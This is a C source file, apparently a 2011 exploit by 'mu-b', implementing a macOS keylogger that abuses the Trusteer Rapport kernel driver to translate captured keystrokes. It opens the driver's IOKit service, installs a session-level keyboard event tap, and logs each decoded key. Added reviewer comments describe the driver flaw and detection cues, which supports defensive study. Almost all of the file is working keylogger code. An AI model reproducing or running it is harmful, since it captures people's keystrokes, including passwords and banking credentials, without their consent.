Trusteer Rapport key decryptor / keylogger exploit that uses Trusteer's own functionality to 'decrypt' keys directly.
c8f6cb87a1da1cd5f8ebbf54d12f5416d0be16db65d6f07abce191af94431441
/* rapport-listen.c
*
* Copyright (c) 2011 by <mu-b@digit-labs.org>
*
* Trusteer Rapport key decryptor/keylogger
* by mu-b - Thu 07 Jul 2011
*
* - Tested on: Trusteer Rapport (Apple MACOS X 10.6.4)
*
* erm, broken design you might say? some might say useless.
*
* compile: gcc -Wall rapport-listen.c -o rapport-listen -framework IOKit -framework ApplicationServices
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2011!@$!
*/
#include <stdio.h>
#include <stdlib.h>
#include <ApplicationServices/ApplicationServices.h>
/*
 * Connection to the "com_trusteer_rapportke" IOKit service. main() opens it
 * with IOServiceOpen() and keylogger_callback() issues its method calls on it.
 * It is file-scope because the callback is installed with a NULL refcon, so
 * the handle cannot reach the callback any other way.
 */
io_connect_t rapport_port;
/*
 * Event-tap callback installed by main().
 *
 * For each key-down event it reads the keycode carried by the event, passes it
 * as the single scalar input to external method 1 on rapport_port, and on
 * success prints that input next to the single scalar the driver returned.
 * The file header describes this driver call as Rapport's own key decryption;
 * nothing in this file shows what the driver actually computes.
 *
 * proxy and refcon are unused. The event is always returned unmodified, so the
 * tap only observes keystrokes and never alters or drops them.
 *
 * NOTE(review): the defensive point is that the translation service is
 * reachable over a connection main() opened from an ordinary process, i.e. the
 * same context that can observe the events. Presumably the driver does not
 * validate its caller; that is not visible here and should be confirmed
 * against the driver. A driver offering such a method needs to restrict which
 * clients may open it.
 */
static CGEventRef
keylogger_callback (CGEventTapProxy proxy, CGEventType type,
                    CGEventRef event, void *refcon)
{
    uint64_t scalar_in;
    uint64_t scalar_out;
    uint32_t scalar_out_count;
    kern_return_t status;

    if (type == kCGEventKeyDown) {
        /* The keycode field is read as an integer and narrowed to CGKeyCode
         * before being widened into the 64-bit scalar the IOKit call takes. */
        scalar_in = (CGKeyCode) CGEventGetIntegerValueField (event, kCGKeyboardEventKeycode);

        /* One scalar in, room for one scalar out; the count is in/out. */
        scalar_out = 0;
        scalar_out_count = 1;
        status = IOConnectCallScalarMethod (rapport_port, 1,
                                            &scalar_in, 1,
                                            &scalar_out, &scalar_out_count);

        /* A failed call is silently skipped; only successful results are logged. */
        if (status == kIOReturnSuccess) {
            fprintf (stdout, "output, e: %d, d: %d\n",
                     (uint32_t) scalar_in, (uint32_t) scalar_out);
        }
    }

    /* Hand the original event back so delivery continues as normal. */
    return event;
}
/*
 * Entry point.
 *
 * 1. Prints a banner.
 * 2. Looks up the IOKit service named "com_trusteer_rapportke" and opens a
 *    connection (type 0) to it, stored in the file-scope rapport_port.
 * 3. Creates a session-level event tap for key-down events with
 *    keylogger_callback as the handler, attaches it to the current run loop
 *    and enables it.
 * 4. Runs the run loop; the final return is reached only if the loop stops.
 *
 * Returns EXIT_FAILURE if the service is not found, the connection cannot be
 * opened, or the tap cannot be created. argc and argv are unused. Nothing
 * opened here is closed or released explicitly.
 *
 * NOTE(review): for detection, the two behaviours visible in this function are
 * a user-space process opening a connection to the com_trusteer_rapportke
 * service and that same process installing a keyboard event tap on the login
 * session. Apple's documentation states that key events reach a tap only when
 * the process runs as root or assistive-device access is enabled, which bounds
 * where this applies; confirm for the OS version in question.
 */
int
main (int argc, char **argv)
{
    io_service_t kext_service;
    kern_return_t status;
    CGEventMask key_down_mask;
    CFMachPortRef tap;
    CFRunLoopSourceRef tap_source;

    printf ("Trusteer Rapport key decryptor/keylogger\n"
            "by: <mu-b@digit-labs.org>\n"
            "http://www.digit-labs.org/ -- Digit-Labs 2011!@$!\n\n");

    /* Locate the driver by its IOKit class name; 0 means no match. */
    kext_service = IOServiceGetMatchingService (kIOMasterPortDefault,
                                                IOServiceMatching ("com_trusteer_rapportke"));
    if (kext_service == 0) {
        fprintf (stderr, "* IOServiceGetMatchingService failed, rapport running?\n");
        return EXIT_FAILURE;
    }

    /* Open the connection, then drop the service reference whether or not the
     * open succeeded; only the connection handle is needed afterwards. */
    rapport_port = 0;
    status = IOServiceOpen (kext_service, mach_task_self (), 0, &rapport_port);
    IOObjectRelease (kext_service);
    if (status != kIOReturnSuccess) {
        fprintf (stderr, "* IOServiceOpen failed\n");
        return EXIT_FAILURE;
    }

    /* Session-scope tap, inserted at the head of the tap list, options 0,
     * restricted to key-down events. */
    key_down_mask = (1 << kCGEventKeyDown);
    tap = CGEventTapCreate (kCGSessionEventTap, kCGHeadInsertEventTap, 0,
                            key_down_mask, keylogger_callback, NULL);
    if (tap == NULL) {
        fprintf (stderr, "* failed to create event tap\n");
        return EXIT_FAILURE;
    }

    /* Wrap the tap's Mach port in a run-loop source so the callback is driven
     * by this thread's run loop. */
    tap_source = CFMachPortCreateRunLoopSource (kCFAllocatorDefault, tap, 0);
    CFRunLoopAddSource (CFRunLoopGetCurrent (), tap_source, kCFRunLoopCommonModes);
    CGEventTapEnable (tap, true);

    printf ("* waiting for keys\n");
    CFRunLoopRun ();

    return EXIT_SUCCESS;
}